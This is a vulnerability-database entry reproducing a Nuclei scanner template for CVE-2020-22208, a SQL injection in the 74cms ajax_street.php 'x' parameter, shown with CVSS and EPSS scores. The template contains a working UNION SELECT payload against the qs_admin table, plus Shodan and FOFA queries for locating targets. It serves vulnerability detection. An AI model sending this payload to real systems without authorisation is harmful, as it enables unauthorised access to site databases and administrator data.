Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-22208
HistoryJun 05, 2022 - 10:40 a.m.

74cms - ajax_street.php 'x' SQL Injection

2022-06-0510:40:44
ProjectDiscovery
github.com
3

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

0.177 Low

EPSS

Percentile

96.2%

SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.
id: CVE-2020-22208

info:
  name: 74cms - ajax_street.php 'x' SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying database.
  remediation: |
    Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability.
  reference:
    - https://github.com/blindkey/cve_like/issues/10
    - https://nvd.nist.gov/vuln/detail/CVE-2020-22208
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-22208
    cwe-id: CWE-89
    epss-score: 0.18558
    epss-percentile: 0.96216
    cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: 74cms
    product: 74cms
    shodan-query: http.html:"74cms"
    fofa-query:
      - app="74cms"
      - body="74cms"
  tags: cve2020,cve,74cms,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11�%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#'

    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'
# digest: 4a0a00473045022100d360add97dfb5a901ef84c443dd9348407cd194e04340c860a46a6dafb882e7d02206276a370772567e058cc176685f2997ed2049ecc5044ffd2ed05bb0678ad751c:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.9 High

AI Score

Confidence

High

0.177 Low

EPSS

Percentile

96.2%

Related for NUCLEI:CVE-2020-22208